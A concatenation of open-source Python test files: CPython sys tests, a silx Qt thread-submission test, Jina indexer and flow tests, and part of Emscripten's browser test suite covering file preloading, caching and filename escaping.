expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
test_async.py
|
# coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2018 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""Test of async module."""
from __future__ import absolute_import
__authors__ = ["T. Vincent"]
__license__ = "MIT"
__date__ = "09/03/2018"
import threading
import unittest
from concurrent.futures import wait
from silx.gui import qt
from silx.gui.utils.testutils import TestCaseQt
from silx.gui.utils import concurrent
class TestSubmitToQtThread(TestCaseQt):
"""Test submission of tasks to Qt main thread"""
def setUp(self):
# Reset executor to test lazy-loading in different conditions
concurrent._executor = None
super(TestSubmitToQtThread, self).setUp()
def _task(self, value1, value2):
return value1, value2
def _taskWithException(self, *args, **kwargs):
raise RuntimeError('task exception')
def testFromMainThread(self):
"""Call submitToQtMainThread from the main thread"""
value1, value2 = 0, 1
future = concurrent.submitToQtMainThread(self._task, value1, value2=value2)
self.assertTrue(future.done())
self.assertEqual(future.result(1), (value1, value2))
self.assertIsNone(future.exception(1))
future = concurrent.submitToQtMainThread(self._taskWithException)
self.assertTrue(future.done())
with self.assertRaises(RuntimeError):
future.result(1)
self.assertIsInstance(future.exception(1), RuntimeError)
def _threadedTest(self):
"""Function run in a thread for the tests"""
value1, value2 = 0, 1
future = concurrent.submitToQtMainThread(self._task, value1, value2=value2)
wait([future], 3)
self.assertTrue(future.done())
self.assertEqual(future.result(1), (value1, value2))
self.assertIsNone(future.exception(1))
future = concurrent.submitToQtMainThread(self._taskWithException)
wait([future], 3)
self.assertTrue(future.done())
with self.assertRaises(RuntimeError):
future.result(1)
self.assertIsInstance(future.exception(1), RuntimeError)
def testFromPythonThread(self):
"""Call submitToQtMainThread from a Python thread"""
thread = threading.Thread(target=self._threadedTest)
thread.start()
for i in range(100): # Loop over for 10 seconds
self.qapp.processEvents()
thread.join(0.1)
if not thread.is_alive():
break
else:
self.fail(('Thread task still running'))
def testFromQtThread(self):
"""Call submitToQtMainThread from a Qt thread pool"""
class Runner(qt.QRunnable):
def __init__(self, fn):
super(Runner, self).__init__()
self._fn = fn
def run(self):
self._fn()
def autoDelete(self):
return True
threadPool = qt.silxGlobalThreadPool()
runner = Runner(self._threadedTest)
threadPool.start(runner)
for i in range(100): # Loop over for 10 seconds
self.qapp.processEvents()
done = threadPool.waitForDone(100)
if done:
break
else:
self.fail('Thread pool task still running')
|
test_index.py
|
import os
import multiprocessing as mp
import pytest
import numpy as np
from jina.enums import FlowOptimizeLevel
from jina.executors.indexers.vector import NumpyIndexer
from jina.flow import Flow
from jina.parsers.flow import set_flow_parser
from jina.proto import jina_pb2
from jina import Document
from tests import random_docs
cur_dir = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope='function')
def test_workspace_index(tmpdir):
os.environ['JINA_TEST_INDEX'] = str(tmpdir)
workspace_path = os.environ['JINA_TEST_INDEX']
yield workspace_path
del os.environ['JINA_TEST_INDEX']
@pytest.fixture(scope='function')
def test_workspace_joint(tmpdir):
os.environ['JINA_TEST_JOINT'] = str(tmpdir)
workspace_path = os.environ['JINA_TEST_JOINT']
yield workspace_path
del os.environ['JINA_TEST_JOINT']
def get_result(resp):
n = []
for d in resp.search.docs:
n.append([k.id for k in d.matches])
n = np.array(n)
# each doc should return a list of top-100
np.testing.assert_equal(n.shape[0], 2)
np.testing.assert_equal(n.shape[1], 50)
class DummyIndexer(NumpyIndexer):
# the add() function is simply copied from NumpyIndexer
def add(self, *args, **kwargs):
pass
class DummyIndexer2(NumpyIndexer):
# the add() function is simply copied from NumpyIndexer
def add(self, keys: 'np.ndarray', vectors: 'np.ndarray', *args, **kwargs):
if len(vectors.shape) != 2:
raise ValueError(f'vectors shape {vectors.shape} is not valid, expecting "vectors" to have rank of 2')
if not self.num_dim:
self.num_dim = vectors.shape[1]
self.dtype = vectors.dtype.name
elif self.num_dim != vectors.shape[1]:
raise ValueError(
"vectors' shape [%d, %d] does not match with indexers's dim: %d" %
(vectors.shape[0], vectors.shape[1], self.num_dim))
elif self.dtype != vectors.dtype.name:
raise TypeError(
f"vectors' dtype {vectors.dtype.name} does not match with indexers's dtype: {self.dtype}")
elif keys.shape[0] != vectors.shape[0]:
raise ValueError('number of key %d not equal to number of vectors %d' % (keys.shape[0], vectors.shape[0]))
elif self.key_dtype != keys.dtype.name:
raise TypeError(
f"keys' dtype {keys.dtype.name} does not match with indexers keys's dtype: {self.key_dtype}")
self.write_handler.write(vectors.tobytes())
self.key_bytes += keys.tobytes()
self.key_dtype = keys.dtype.name
self._size += keys.shape[0]
def test_doc_iters():
docs = random_docs(3, 5)
for doc in docs:
assert isinstance(doc, Document)
def test_simple_route():
f = Flow().add()
with f:
f.index(input_fn=random_docs(10))
def test_update_method(test_metas):
with DummyIndexer(index_filename='testa.bin', metas=test_metas) as indexer:
indexer.save()
assert not os.path.exists(indexer.save_abspath)
assert not os.path.exists(indexer.index_abspath)
indexer.add()
indexer.save()
assert os.path.exists(indexer.save_abspath)
assert os.path.exists(indexer.index_abspath)
with DummyIndexer2(index_filename='testb.bin', metas=test_metas) as indexer:
indexer.save()
assert not os.path.exists(indexer.save_abspath)
assert not os.path.exists(indexer.index_abspath)
indexer.add(np.array([1, 2, 3]), np.array([[1, 1, 1], [2, 2, 2]]))
indexer.save()
assert os.path.exists(indexer.save_abspath)
assert os.path.exists(indexer.index_abspath)
@pytest.mark.skipif('GITHUB_WORKFLOW' in os.environ, reason='skip the network test on github workflow')
def test_two_client_route_parallel():
fa1 = set_flow_parser().parse_args(['--optimize-level', str(FlowOptimizeLevel.NONE)])
f1 = Flow(fa1).add(parallel=3)
f2 = Flow(optimize_level=FlowOptimizeLevel.IGNORE_GATEWAY).add(parallel=3)
def start_client(fl):
fl.index(input_fn=random_docs(10))
with f1:
assert f1.num_peas == 6
t1 = mp.Process(target=start_client, args=(f1,))
t1.daemon = True
t2 = mp.Process(target=start_client, args=(f1,))
t2.daemon = True
t1.start()
t2.start()
with f2:
# no optimization can be made because we ignored the gateway
assert f2.num_peas == 6
t1 = mp.Process(target=start_client, args=(f2,))
t1.daemon = True
t2 = mp.Process(target=start_client, args=(f2,))
t2.daemon = True
t1.start()
t2.start()
@pytest.mark.skipif('GITHUB_WORKFLOW' in os.environ, reason='skip the network test on github workflow')
def test_two_client_route():
def start_client(fl):
fl.index(input_fn=random_docs(10))
with Flow().add() as f:
t1 = mp.Process(target=start_client, args=(f,))
t1.daemon = True
t2 = mp.Process(target=start_client, args=(f,))
t2.daemon = True
t1.start()
t2.start()
def test_index(test_workspace_index):
f = Flow().add(uses=os.path.join(cur_dir, 'yaml/test-index.yml'), parallel=3, separated_workspace=True)
with f:
f.index(input_fn=random_docs(50))
for j in range(3):
assert os.path.join(test_workspace_index, f'test2-{j + 1}/test2.bin')
assert os.path.exists(os.path.join(test_workspace_index, f'test2-{j + 1}/tmp2'))
def test_compound_idx(test_workspace_joint, mocker):
def validate(req):
assert req.status.code < jina_pb2.StatusProto.ERROR
assert req.search.docs[0].matches[0].score.op_name == 'NumpyIndexer'
with Flow().add(uses=os.path.join(cur_dir, 'yaml/test-joint.yml')) as f:
f.index(random_docs(100, chunks_per_doc=0))
response_mock = mocker.Mock(wrap=validate)
with Flow().add(uses=os.path.join(cur_dir, 'yaml/test-joint.yml')) as g:
g.search(random_docs(10, chunks_per_doc=0), on_done=response_mock)
response_mock.assert_called()
|
test_browser.py
|
# coding=utf-8
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, get_browser
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import Popen, try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
requires_graphics_hardware = unittest.skipIf(os.environ.get('EM_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.environ.get('EM_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
